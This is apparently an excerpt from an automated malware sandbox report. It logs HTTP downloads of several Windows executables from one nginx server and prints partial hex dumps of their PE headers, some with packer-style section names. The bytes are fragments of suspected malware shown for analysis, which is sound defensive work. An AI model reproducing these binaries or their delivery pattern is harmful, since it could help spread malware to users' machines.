a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c8 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 c7 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 
63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 77 72 6f 74 77 75 77 00 20 2b 00 00 b0 06 00 00 1c 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 69 61 6d 62 6d 78 00 10 00 00 00 d0 31 00 00 04 00 00 00 10 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 31 00 00 22 00 00 00 14 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:15 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Sat, 01 Feb 2025 13:57:48 GMTConnection: keep-aliveETag: "679e285c-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 20 ac 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 6f 6d 61 66 76 71 00 30 1a 00 00 80 30 00 00 22 1a 00 00 a6 02 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 e0 72 78 6d 67 76 79 6e 7a 00 10 00 00 00 b0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:21 GMTContent-Type: application/octet-streamContent-Length: 1013457Last-Modified: Tue, 28 Jan 2025 06:49:56 GMTConnection: keep-aliveETag: "67987e14-f76d1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 f5 d7 0f 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 c6 5e 00 00 00 00 00 00 00 00 00 00 69 4e 0f 00 68 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 
00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c6 5e 00 00 00 00 10 00 00 60 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:25 GMTContent-Type: application/octet-streamContent-Length: 1890304Last-Modified: Sat, 01 Feb 2025 15:20:01 GMTConnection: keep-aliveETag: "679e3ba1-1cd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 cb 85 81 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 28 04 00 00 ba 00 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 3e a5 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 50 05 00 6b 00 00 00 00 40 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 7a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 40 05 00 00 02 00 00 00 8a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 60 05 00 00 02 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 6c 6d 6a 74 6a 69 00 30 1a 00 00 70 30 00 00 22 1a 00 00 90 02 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 65 77 66 6e 68 6b 00 10 00 00 00 a0 4a 00 00 04 00 00 00 b2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 b6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:31 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 
00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:37 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 
00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:42 GMTContent-Type: application/octet-streamContent-Length: 10584064Last-Modified: Sat, 01 Feb 2025 09:45:44 GMTConnection: keep-aliveETag: "679ded48-a18000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d 82 ee b9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e0 a0 00 00 9e 00 00 00 00 00 00 f2 fd a0 00 00 20 00 00 00 00 a1 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 a1 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 fd a0 00 4f 00 00 00 00 00 a1 00 64 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 a1 00 0c 00 00 00 84 fd a0 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 de a0 00 00 20 00 00 00 e0 a0 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 64 9b 00 00 00 00 a1 00 00 9c 00 00 00 e2 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 a1 00 00 02 00 00 00 7e a1 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 fd a0 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 27 00 00 00 3d 00 00 03 00 02 00 25 00 00 06 8c 64 00 00 f8 98 a0 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 72 01 00 00 70 28 13 00 00 0a 2a a6 17 8d 2a 00 00 01 25 16 20 dd 3a 17 59 9e 80 01 00 00 04 7f 02 00 00 04 fe 15 01 00 00 1b 73 14 00 00 0a 80 03 00 00 04 2a 2e 72 35 00 00 70 28 15 00 00 0a 2a b2 19 8d 2c 00 00 01 25 d0 3a 00 00 04 28 16 00 00 0a 80 04 00 00 04 7f 05 00 00 04 fe 15 02 00 00 1b 73 14 00 00 0a 80 06 00 00 04 2a 2e 72 4f 00 00 70 28 15 00 00 0a 2a 2e 72 7f 00 00 70 28 17 00 00 0a 2a 2e 72 ad 00 00 70 28 13 00 00 0a 2a 2e 72 d3 00 00 70 28 17 00 00 0a 2a 06 2a 06 2a 6e 02 17 8d 2a 00 00 01 25 16 20 16 80 c9 30 9e 7d 07 00 00 04 02 28 18 00 00 0a 2a 2e 72 eb 00 00 70 28 19 00 00 0a 2a a6 02 19 8d 2c 00 00 01 25 d0 36 00 00 04 28 16 00 00 0a 7d 09 00 00 04 02 73 14 00 00 0a 7d 0b 00 00 04 02 28 18 00 00 0a 2a 2e 72 05 01 00 70 28 1a 00 00 0a 2a 2e 72 3d 01 00 70 28 1b 00 00 0a 2a 00 00 00 1b 30 04 00 7b 00 00 00 01 00 00 11 73 1c 00 00 0a 0a 73 1d 00 00 0a 0b 07 28 1e 00 00 0a 03 6f 1f 00 00 0a 6f 20 00 00 0a 0c 06 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:52:55 GMTContent-Type: application/octet-streamContent-Length: 3789149Last-Modified: Sat, 01 Feb 2025 10:03:34 GMTConnection: keep-aliveETag: "679df176-39d15d"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 
